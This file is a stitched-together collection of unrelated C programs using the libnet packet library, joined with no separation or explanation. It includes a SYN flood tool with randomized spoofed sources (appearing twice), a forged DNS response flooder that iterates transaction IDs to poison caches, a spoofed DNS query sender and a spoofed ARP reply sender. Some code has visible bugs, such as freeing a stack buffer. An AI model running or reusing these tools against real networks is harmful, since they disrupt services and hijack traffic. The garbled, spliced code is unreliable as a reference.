int main(int argc,char *argv[])
{
char a;
int sock,r;
u_long src;
u_long dst;
char pktbuf[IP_MAXPACKET];
char payload[]="ABCDEFGHIJKLMNOPRST";
u_char options[4];
struct ipoption ipopt;
bzero(options,OPT_LEN);
while((a=getopt(argc,argv,"d:s:h?"))!=EOF)
{
switch(a) {
case 'h' : { usage(); exit(1); }
case 's' : { src=libnet_name_resolve(optarg,0); break;}
case 'd' : { dst=libnet_name_resolve(optarg,0); break;}
}
}
sock = libnet_open_raw_sock(IPPROTO_RAW);
if (sock<0)
{
perror("socket");
exit(1);
}
libnet_build_ip(strlen(payload),0,0x1337,0,255,0xaa,src,dst,payload,strlen(payload),pktbuf);
memcpy(ipopt.ipopt_list, options, OPT_LEN);
*(ipopt.ipopt_list) = 0xe4;
*(ipopt.ipopt_list+1) = 0;
*(ipopt.ipopt_list+1) = 0;
*(ipopt.ipopt_list+1) = 0;
r=libnet_insert_ipo(&ipopt,OPT_LEN,pktbuf);
if (r <0)
{
libnet_close_raw_sock(sock);
printf("Error ip options insertion failed\n");
exit(1);
}
r=libnet_write_ip(sock,pktbuf,LIBNET_IP_H+OPT_LEN+strlen(payload));
if (r<0)
{
libnet_close_raw_sock(sock);
printf("Error write_ip \n");
exit(1);
}
libnet_close_raw_sock(sock);
return 0;
}
void
abort (void)
{
printf (":: exiting...\n\n");
libnet_close_raw_sock (s);
libnet_destroy_packet (&packet);
exit (EXIT_SUCCESS);
}
int main(int argc, char *argv[]) {
u_long dest_ip;
u_short dest_port;
u_char errbuf[LIBNET_ERRBUF_SIZE], *packet;
int opt, network, byte_count, packet_size = LIBNET_IP_H + LIBNET_TCP_H;
if(argc < 3)
{
printf("Usage:\n%s\t <target host> <target port>\n", argv[0]);
exit(1);
}
dest_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE); // the host
dest_port = (u_short) atoi(argv[2]); // the port
network = libnet_open_raw_sock(IPPROTO_RAW); // open network interface
if (network == -1)
libnet_error(LIBNET_ERR_FATAL, "can't open network interface. -- this program must run as root.\n");
libnet_init_packet(packet_size, &packet); // allocate memory for packet
if (packet == NULL)
libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory.\n");
libnet_seed_prand(); // seed the random number generator
printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip));
while(1) // loop forever (until break by CTRL-C)
{
libnet_build_ip(LIBNET_TCP_H, // size of the packet sans IP header
IPTOS_LOWDELAY, // IP tos
libnet_get_prand(LIBNET_PRu16), // IP ID (randomized)
0, // frag stuff
libnet_get_prand(LIBNET_PR8), // TTL (randomized)
IPPROTO_TCP, // transport protocol
libnet_get_prand(LIBNET_PRu32), // source IP (randomized)
dest_ip, // destination IP
NULL, // payload (none)
0, // payload length
packet); // packet header memory
libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // source TCP port (random)
dest_port, // destination TCP port
libnet_get_prand(LIBNET_PRu32), // sequence number (randomized)
libnet_get_prand(LIBNET_PRu32), // acknowledgement number (randomized)
TH_SYN, // control flags (SYN flag set only)
libnet_get_prand(LIBNET_PRu16), // window size (randomized)
0, // urgent pointer
NULL, // payload (none)
0, // payload length
packet + LIBNET_IP_H); // packet header memory
if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1)
libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n");
byte_count = libnet_write_ip(network, packet, packet_size); // inject packet
if (byte_count < packet_size)
libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written. (%d of %d bytes)", byte_count, packet_size);
usleep(FLOOD_DELAY); // wait for FLOOD_DELAY milliseconds
}
libnet_destroy_packet(&packet); // free packet memory
if (libnet_close_raw_sock(network) == -1) // close the network interface
libnet_error(LIBNET_ERR_WARNING, "can't close network interface.");
return 0;
}
int buildudp(ETHERhdr *eth, IPhdr *ip, UDPhdr *udp, FileData *pd,
FileData *ipod, char *device)
{
int n;
u_int32_t udp_packetlen = 0, udp_meta_packetlen = 0;
static u_int8_t *pkt;
static int sockfd = -1;
struct libnet_link_int *l2 = NULL;
u_int8_t link_offset = 0;
#if !defined(WIN32)
int sockbuff = IP_MAXPACKET;
#endif
if (pd->file_mem == NULL)
pd->file_s = 0;
if (ipod->file_mem == NULL)
ipod->file_s = 0;
if (got_link) /* data link layer transport */
{
if ((l2 = libnet_open_link_interface(device, errbuf)) == NULL)
{
nemesis_device_failure(INJECTION_LINK, (const char *)device);
return -1;
}
link_offset = LIBNET_ETH_H;
}
else
{
if ((sockfd = libnet_open_raw_sock(IPPROTO_RAW)) < 0)
{
nemesis_device_failure(INJECTION_RAW, (const char *)NULL);
return -1;
}
#if !defined(WIN32)
if ((setsockopt(sockfd, SOL_SOCKET, SO_SNDBUF, (const void *)&sockbuff,
sizeof(sockbuff))) < 0)
{
fprintf(stderr, "ERROR: setsockopt() failed.\n");
return -1;
}
#endif
}
udp_packetlen = link_offset + LIBNET_IP_H + LIBNET_UDP_H + pd->file_s +
ipod->file_s;
udp_meta_packetlen = udp_packetlen - (link_offset + LIBNET_IP_H);
#ifdef DEBUG
printf("DEBUG: UDP packet length %u.\n", udp_packetlen);
printf("DEBUG: IP options size %u.\n", ipod->file_s);
printf("DEBUG: UDP payload size %u.\n", pd->file_s);
#endif
if (libnet_init_packet(udp_packetlen, &pkt) == -1)
{
fprintf(stderr, "ERROR: Unable to allocate packet memory.\n");
return -1;
}
if (got_link)
libnet_build_ethernet(eth->ether_dhost, eth->ether_shost, ETHERTYPE_IP,
NULL, 0, pkt);
libnet_build_ip(udp_meta_packetlen, ip->ip_tos, ip->ip_id, ip->ip_off,
ip->ip_ttl, ip->ip_p, ip->ip_src.s_addr, ip->ip_dst.s_addr,
NULL, 0, pkt + link_offset);
libnet_build_udp(udp->uh_sport, udp->uh_dport, pd->file_mem,
pd->file_s, pkt + link_offset + LIBNET_IP_H);
if (got_ipoptions)
{
if ((libnet_insert_ipo((struct ipoption *)ipod->file_mem,
ipod->file_s, pkt + link_offset)) == -1)
{
fprintf(stderr, "ERROR: Unable to add IP options, discarding "
"them.\n");
}
}
if (got_link)
libnet_do_checksum(pkt + LIBNET_ETH_H, IPPROTO_IP, LIBNET_IP_H +
ipod->file_s);
libnet_do_checksum(pkt + link_offset, IPPROTO_UDP, LIBNET_UDP_H +
pd->file_s + ipod->file_s);
if (got_link)
n = libnet_write_link_layer(l2, device, pkt, udp_packetlen);
else
n = libnet_write_ip(sockfd, pkt, udp_packetlen);
if (verbose == 2)
nemesis_hexdump(pkt, udp_packetlen, HEX_ASCII_DECODE);
if (verbose == 3)
nemesis_hexdump(pkt, udp_packetlen, HEX_RAW_DECODE);
if (n != udp_packetlen)
{
fprintf(stderr, "ERROR: Incomplete packet injection. Only wrote "
"%d bytes.\n", n);
}
else
{
if (verbose)
{
if (got_link)
printf("Wrote %d byte UDP packet through linktype %s.\n", n,
nemesis_lookup_linktype(l2->linktype));
else
printf("Wrote %d byte UDP packet.\n", n);
}
}
libnet_destroy_packet(&pkt);
if (got_link)
libnet_close_link_interface(l2);
else
libnet_close_raw_sock(sockfd);
return n;
}
int main (int argc, char **argv) {
u_long src_ip, /* source address */
dst_ip; /* destination address */
u_short src_port, /* source port */
dst_port, /* destination port */
id; /* dns id we are spoofing */
int written_bytes, /* number of bytes written */
packet_size, /* size of our packet */
payload_size, /* size of our payload */
socket; /* socket to write on */
u_char *packet, /* we build this */
*payload; /* we send this */
if (argc < 6) {
printf("\nusage: ask_dns <source_ip> <port> <destination_ip> <port> <dns_id>\n");
exit (EXIT_FAILURE);
}
if ((socket = libnet_open_raw_sock(IPPROTO_RAW)) == -1)
libnet_error(LIBNET_ERR_FATAL, "network initialization failed\n");
src_ip = libnet_name_resolve(argv[1], 0);
dst_ip = libnet_name_resolve(argv[3], 0);
src_port = (u_short) atoi(argv[2]);
dst_port = (u_short) atoi(argv[4]);
id = (u_short) atoi(argv[5]);
payload = "\x03\x77\x77\x77\x07\x72\x65\x64\x68\x69\x76\x65\x03\x63\x6f\x6d\x00\x00\x01\x00\x01";
payload_size = 21;
/*
* packet memory allocation
*/
packet_size = payload_size + LIBNET_IP_H + LIBNET_UDP_H + LIBNET_DNS_H;
libnet_init_packet(packet_size, &packet);
if (packet == NULL)
libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n");
/*
* ip header construction
*/
libnet_build_ip(payload_size + LIBNET_UDP_H + LIBNET_DNS_H,
0, /* ip tos */
0, /* ip id */
0, /* fragmentation bits */
64, /* ttl */
IPPROTO_UDP, /* protocol */
src_ip, /* source address */
dst_ip, /* destination address */
NULL, /* payload */
0, /* payload length */
packet); /* packet buffer */
/*
* udp header construction
* during debugging i found that we weren't generating the correct
* length here, that is why a payload length is included (payload + dns_header)
* it really shouldn't be here though
*/
libnet_build_udp(src_port, /* source port */
dst_port, /* destination port */
NULL, /* payload */
33, /* payload length */
packet + LIBNET_IP_H);
/*
* dns header construction
*/
libnet_build_dns(id, /* dns id */
0x0100, /* control flags */
1, /* number of questions */
0, /* number of answer RR's */
0, /* number of authority RR's */
0, /* number of additional RR's */
payload, /* payload */
payload_size, /* payload length */
packet + LIBNET_IP_H + LIBNET_UDP_H);
/*
* calculate checksum
*/
libnet_do_checksum (packet, IPPROTO_UDP, packet_size - LIBNET_IP_H);
/*
* write packet
*/
written_bytes = libnet_write_ip(socket, packet, packet_size);
/*
* make sure the number of written bytes jives with what we expect
*/
if (written_bytes < packet_size)
libnet_error(LN_ERR_WARNING, "libnet_write_ip only wrote %d of %d bytes\n", written_bytes, packet_size);
/*
* we're done with this packet
*/
libnet_destroy_packet(&packet);
/*
* we're done writing
*/
if (libnet_close_raw_sock(socket) == -1)
libnet_error(LN_ERR_WARNING, "libnet_close_raw_sock couldn't close the interface");
return (written_bytes == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}
int main (int argc, char **argv) {
u_long src_ip, /* source address */
dst_ip; /* destination address */
u_short src_port, /* source port */
dst_port, /* destination port */
id; /* dns id we are spoofing */
int i, /* loop counter */
written_bytes, /* number of bytes written */
packet_size, /* size of our packet */
payload_size, /* size of our payload */
npackets, /* num of packet to write */
socket; /* socket to write on */
u_char *packet, /* we build this */
*payload; /* we send this */
if (argc < 7) {
printf("\nusage: answer_dns <source_ip> <port> <destination_ip> <port> <dns_id> <#_packets>\n");
exit (EXIT_FAILURE);
}
if ((socket = libnet_open_raw_sock(IPPROTO_RAW)) == -1)
libnet_error(LIBNET_ERR_FATAL, "network initialization failed\n");
src_ip = libnet_name_resolve(argv[1], 0);
dst_ip = libnet_name_resolve(argv[3], 0);
src_port = (u_short) atoi(argv[2]);
dst_port = (u_short) atoi(argv[4]);
id = (u_short) atoi(argv[5]);
npackets = (int) atoi(argv[6]);
payload = /* question section name/types, size: 21 */
"\x03\x77\x77\x77\x07\x72\x65\x64\x68\x69\x76\x65\x03\x63\x6f\x6d\x00\x00\x01\x00\x01"
/* answer section, names/types, size: 21 */
"\x03\x77\x77\x77\x07\x72\x65\x64\x68\x69\x76\x65\x03\x63\x6f\x6d\x00\x00\x01\x00\x01"
/* answer section, ttl, size: 4 */
"\xff\xff\xff\xff"
/* answer section, rdata length, size: 2 */
"\x00\x04"
/* answer section, rdata, size: 4 */
"\x81\x51\xe0\x43";
payload_size = 52;
/*
* packet memory allocation
*/
packet_size = payload_size + LIBNET_IP_H + LIBNET_UDP_H + LIBNET_DNS_H;
libnet_init_packet(packet_size, &packet);
if (packet == NULL)
libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n");
/*
* ip header construction
*/
libnet_build_ip(payload_size + LIBNET_UDP_H + LIBNET_DNS_H,
0, /* ip tos */
10951, /* ip id */
0, /* fragmentation bits */
64, /* ttl */
IPPROTO_UDP, /* protocol */
src_ip, /* source address */
dst_ip, /* destination address */
NULL, /* payload */
0, /* payload length */
packet); /* packet buffer */
/*
* udp header construction
* during debugging i found that we weren't generating the correct
* length here, that is why a payload length is included (payload + dns_header)
* it really shouldn't be here though
*/
libnet_build_udp(src_port, /* source port */
dst_port, /* destination port */
NULL, /* payload */
payload_size + 12, /* payload length */
packet + LIBNET_IP_H);
/*
* write npackets
* we loop from here because we must change the dns id and also re-checksum
*/
printf("\nwriting packets");
for (i = 0; i < npackets; i++) {
printf(".");
/*
* dns header construction
*/
libnet_build_dns(id+i, /* dns id */
0x8180, /* control flags */
1, /* number of questions */
1, /* number of answer RR's */
0, /* number of authority RR's */
0, /* number of additional RR's */
payload, /* payload */
payload_size, /* payload length */
packet + LIBNET_IP_H + LIBNET_UDP_H);
/*
* calculate checksum
*/
libnet_do_checksum (packet, IPPROTO_UDP, packet_size - LIBNET_IP_H);
/*
* write packet
*/
written_bytes = libnet_write_ip(socket, packet, packet_size);
/*
* make sure the number of written bytes jives with what we expect
*/
if (written_bytes < packet_size)
libnet_error(LN_ERR_WARNING, "libnet_write_ip only wrote %d of %d bytes\n", written_bytes, packet_size);
}
/*
* cleanup
*/
libnet_destroy_packet(&packet);
if (libnet_close_raw_sock(socket) == -1)
libnet_error(LN_ERR_WARNING, "libnet_close_raw_sock couldn't close the interface");
printf("\n");
return (written_bytes == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}
/*
* injection_write_ip
*
* Description:
* - Write an IP packet into the wire. It can use either raw sockets
* or the wire
*
* Inputs:
* - ip_packet: the IP packet
*
* Outputs:
* - return: 0 if ok, <0 if there were problems
*
*/
int injection_write_ip (u_char *ip_packet)
{
#if defined(INJECT_USING_RAW_SOCKETS) || defined(INJECT_USING_LINK_LAYER)
int i;
u_int16_t packet_size = ntohs(*(u_int16_t*)(ip_packet+2));
#endif
#if defined(INJECT_USING_RAW_SOCKETS)
int network;
/* network initialization */
if ((network = libnet_open_raw_sock(IPPROTO_RAW)) < 0) {
return WIRE_ERR_PKTD_INJECTION_OPEN;
/* packet injection */
} else if ((i = libnet_write_ip (network, ip_packet, packet_size))
< packet_size) {
return WIRE_ERR_PKTD_INJECTION_WRITE_IP;
/* shut down the interface */
} else if (libnet_close_raw_sock (network) < 0) {
return WIRE_ERR_PKTD_INJECTION_CLOSE;
}
return WIRE_ERR_NONE;
#elif defined(INJECT_USING_LINK_LAYER)
char buffer[LIBNET_ETH_H+IP_MAXPACKET];
struct in_addr in;
int size = 1024;
struct libnet_link_int *network; /* pointer to link interface struct */
char *interface = NULL; /* pointer to the device to use */
struct sockaddr_in sin;
char errbuf[1024];
struct ether_addr remote_eth, *tmp_eth;
/* network initialization */
if (libnet_select_device(&sin, &interface, errbuf) == -1) {
return WIRE_ERR_PKTD_NO_WRITE_DEVICE_ACCESS;
}
if ((network = libnet_open_link_interface(interface, errbuf)) == NULL) {
return WIRE_ERR_PKTD_INJECTION_OPEN;
}
/* get local ethernet address */
if ((tmp_eth = libnet_get_hwaddr(network, interface, errbuf)) == NULL) {
(void)libnet_close_link_interface(network);
return WIRE_ERR_PKTD_INJECTION_OPEN;
}
memcpy (&local_eth, tmp_eth, 6);
debug3 ("injection_write_ip: the local ethernet address is %s\n",
ether_ntoa(&local_eth));
/* get remote ethernet address (the packet is already in network order) */
in.s_addr = *(u_int32_t*)(ip_packet+16);
/* try to get the remote MAC address from the ARP cache */
if (get_mac_address (in, buffer, size) < 0) {
/* MAC address of the IP address not in ARP cache */
/* get the gateway needed to reach the destination */
struct in_addr gw;
if (get_gateway (in, &gw) < 0) {
debug3 ("injection_write_ip: can't find MAC nor gateway for %s\n",
inet_ntoa(in));
(void)libnet_close_link_interface(network);
return WIRE_ERR_PKTD_INJECTION_WRITE_IP;
}
/* get the gateway's ethernet address */
if (get_mac_address (gw, buffer, size) < 0) {
debug3 ("injection_write_ip: can't find MAC for %s's ",
inet_ntoa(in));
debug3 ("gateway (%s)\n", inet_ntoa(gw));
/* XXX: This case means typically the destination host is in
* the same network than the source, but the destination MAC
* address is not in the local ARP cache. Getting a local
* MAC address requires implementing ARP, which we won't do
* at this moment
*/
(void)libnet_close_link_interface(network);
return WIRE_ERR_PKTD_INJECTION_WRITE_IP;
}
debug3 ("injection_write_ip: IP address %s can be reached ", inet_ntoa(in));
debug3 ("through gateway %s (%s)\n", inet_ntoa(gw), buffer);
} else {
debug3 ("injection_write_ip: IP address %s corresponds to %s\n",
inet_ntoa(in), buffer);
}
if ((tmp_eth = ether_aton (buffer)) == NULL) {
(void)libnet_close_link_interface(network);
return WIRE_ERR_PKTD_INJECTION_WRITE_IP;
}
memcpy (&remote_eth, tmp_eth, 6);
/* build ethernet header and use IP packet as payload */
#if (defined(bsdi) || defined(__NetBSD__) || defined(__OpenBSD__) ||\
defined(__FreeBSD__))
libnet_build_ethernet(&(remote_eth.octet[0]),
&(local_eth.octet[0]), ETHERTYPE_IP, NULL, 0, buffer);
#else
libnet_build_ethernet(&(remote_eth.ether_addr_octet[0]),
&(local_eth.ether_addr_octet[0]), ETHERTYPE_IP, NULL, 0, buffer);
#endif
memcpy (buffer+LIBNET_ETH_H, ip_packet, packet_size);
packet_size += LIBNET_ETH_H;
/* inject the packet */
if ((i = libnet_write_link_layer (network, interface, buffer,
packet_size)) < packet_size) {
(void)libnet_close_link_interface(network);
return WIRE_ERR_PKTD_INJECTION_WRITE_IP;
}
/* shut down the interface */
(void)libnet_close_link_interface(network);
return WIRE_ERR_NONE;
#else /* INJECT_USING_LINK_LAYER */
return(0);
#endif /* INJECT_USING_LINK_LAYER */
}
int main(int argc, char *argv[]) {
u_long dest_ip;
u_short dest_port;
u_char errbuf[LIBNET_ERRBUF_SIZE], *packet;
int opt, network, byte_count, packet_size = LIBNET_IP_H + LIBNET_TCP_H;
if(argc < 3)
{
printf("使用方法:\n%s\t <対象ホスト> <対象ポート>\n", argv[0]);
exit(1);
}
dest_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE); // ホスト
dest_port = (u_short) atoi(argv[2]); // ポート番号
network = libnet_open_raw_sock(IPPROTO_RAW); // ネットワークインタフェースをオープンする
if (network == -1)
libnet_error(LIBNET_ERR_FATAL, "can't open network interface. -- this program must run as root.\n");
libnet_init_packet(packet_size, &packet); // パケット用のメモリを割り当てる
if (packet == NULL)
libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory.\n");
libnet_seed_prand(); // 乱数生成器に種を与える
printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip));
while(1) // 永久ループ(CTRL-Cで終了されるまで)
{
libnet_build_ip(LIBNET_TCP_H, // IPヘッダを除いたパケットのサイズ
IPTOS_LOWDELAY, // IP tos
libnet_get_prand(LIBNET_PRu16), // IP ID(乱数化)
0, // 断片化
libnet_get_prand(LIBNET_PR8), // TTL (乱数化)
IPPROTO_TCP, // トランスポートプロトコル
libnet_get_prand(LIBNET_PRu32), // 送信元IP (乱数化)
dest_ip, // 宛先IP
NULL, // ペイロード(なし)
0, // ペイロード長
packet); // パケットヘッダメモリ
libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // 送信元TCPポート (乱数化)
dest_port, // 宛先TCPポート
libnet_get_prand(LIBNET_PRu32), // シーケンス番号 (乱数化)
libnet_get_prand(LIBNET_PRu32), // ACK番号 (乱数化)
TH_SYN, // コントロールフラグ (SYNフラグのみ設定)
libnet_get_prand(LIBNET_PRu16), // ウィンドウサイズ (乱数化)
0, // 至急ポインタ
NULL, // ペイロード (なし)
0, // ペイロード長
packet + LIBNET_IP_H); // パケットヘッダメモリ
if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1)
libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n");
byte_count = libnet_write_ip(network, packet, packet_size); // パケットを注入する
if (byte_count < packet_size)
libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written. (%d of %d bytes)", byte_count, packet_size);
usleep(FLOOD_DELAY); // FLOOD_DELAYミリ秒待機する
}
libnet_destroy_packet(&packet); // パケットメモリを解放する
if (libnet_close_raw_sock(network) == -1) // ネットワークインタフェースをクローズする
libnet_error(LIBNET_ERR_WARNING, "can't close network interface.");
return 0;
}
int main(int argc, char *argv[])
{
// packet type (arp/udp/tcp)
char type[5];
// network device
char *device = "eth0\0";
struct libnet_link_int *link;
// Raw socket
int sock;
// error buffer
char errbuff[LIBNET_ERRBUF_SIZE];
// src and dst mac
u_char dmac[6],smac[6];
// src and dst ip
unsigned int src_ip, dst_ip;
// packet buffer
unsigned char *packet;
// packet payload
char *payload;
// payload size
int p_size;
// bytes send over the wire
int send;
// check parameter
if(argc == 1)
{
printf("Usage: %s <arp/udp/tcp>\n",argv[0]);
exit(0);
}
else
{
strcpy(type,argv[1]);
}
// Allocate memory for the payload
payload = malloc(50);
// Packets payload
strcpy(payload,"TEST LIBNET\0");
packet = NULL;
// payload size
p_size = strlen(payload);
// mac address
strcpy(smac,SMAC);
strcpy(dmac,DMAC);
// ip address in network byte order
src_ip = inet_addr(SOURCE);
dst_ip = inet_addr(DEST);
// Lookup ip addresses
src_ip = libnet_name_resolve(libnet_host_lookup(src_ip,0),0);
dst_ip = libnet_name_resolve(libnet_host_lookup(dst_ip,0),0);
// Build an ARP packet?
if(!strcmp(type,"arp"))
{
// open the network device
link = libnet_open_link_interface(device,errbuff);
// Failed?
if(link == NULL)
{
printf("Error while opening device %s!\n%s\n",device,errbuff);
exit(1);
}
printf("Using device %s\n",device);
// Allocate memory for the packet
if(libnet_init_packet(LIBNET_ETH_H+LIBNET_ARP_H+p_size,&packet) == -1)
{
printf("libnet_init_packet error!\n%s\n", strerror(errno));
exit(1);
}
if(packet == NULL)
{
printf("libnet_init_packet error!\n");
exit(1);
}
// Build ethernet header
libnet_build_ethernet(dmac, // destination mac
smac, // source mac
ETHERTYPE_ARP,// ethernet packet type
NULL, // pointer to payload
0, // payload size
packet // pointer to packet buffer
);
printf("Sending ARP reply packet %s --> %s\n",SOURCE,DEST);
libnet_build_arp(ARPHRD_ETHER, // hardware type
ETHERTYPE_IP, // protocol type
ETHER_ADDR_LEN, // hardware address size
4, // protocol address size
ARPOP_REPLY, // ARP operation
smac, // source mac
(u_char *)&src_ip, // source ip
dmac, // destination mac
(u_char *)&dst_ip, // destination ip
NULL, // pointer to payload
0, // payload size
packet+LIBNET_ETH_H // pointer to packet buffer
);
// Get the packet on the wire
send = libnet_write_link_layer(link,device,packet,LIBNET_ETH_H+LIBNET_IP_H+LIBNET_TCP_H+p_size);
// was the complete packet send over the wire?
if(send < LIBNET_IP_H+LIBNET_TCP_H+p_size)
{
printf("error while writing packet into the socket...\n");
}
// close the network device
libnet_close_link_interface(link);
}
else
{
// Open a raw sock
sock = libnet_open_raw_sock(IPPROTO_RAW);
// Allocate memory for the packet
if(libnet_init_packet(LIBNET_IP_H+LIBNET_TCP_H+p_size,&packet) == -1)
{
printf("libnet_init_packet error!\n%s\n", strerror(errno));
exit(1);
}
// Build ip header
libnet_build_ip(LIBNET_TCP_H+p_size,// packet length without ip header length
0, // ip type of service
242, // ip id
0, // fragmentation bit
48, // time to live
IPPROTO_TCP, // Transport Control Protokoll
src_ip, // source ip
dst_ip, // destination ip
NULL, // pointer to ip payload
0, // ip options
packet // pointer to packet buffer
);
// Build UDP packet?
if(!strcmp(type,"udp"))
{
libnet_build_udp(ntohs(SPORT), // Source port
ntohs(DPORT), // destination port
payload, // pointer to packet payload
p_size, // payload size
packet+LIBNET_IP_H // pointer to packet buffer
);
printf("Sending UDP packet %s:%d --> %s.%d\n",SOURCE,SPORT,DEST,DPORT);
}
// Build TCP/IP packet per default
else
{
// Build tcp header
libnet_build_tcp(ntohs(SPORT), // source port
ntohs(DPORT), // destination port
1000000000, // acknowledge number
1000000000, // sequence number
TH_ACK, // tcp flags
1024, // window size
0, // urgent pointer
payload, // pointer to packet payload
p_size, // payload size
packet+LIBNET_IP_H // pointer to the packet buffer
);
printf("Sending TCP packet %s:%d --> %s.%d\n",SOURCE,SPORT,DEST,DPORT);
}
// Calculize checksum
libnet_do_checksum(packet,IPPROTO_TCP,LIBNET_IP_H+LIBNET_TCP_H+p_size);
// Get the packet on the wire
send = libnet_write_ip(sock,packet,LIBNET_IP_H+LIBNET_TCP_H+p_size);
// was the complete packet send over the wire?
if(send < LIBNET_IP_H+LIBNET_TCP_H+p_size)
{
printf("error while writing packet into the socket...\n");
}
// close the socket
libnet_close_raw_sock(sock);
}
// free the memory
//libnet_destroy_packet(packet);
free(payload);
free(errbuff);
return 1;
}
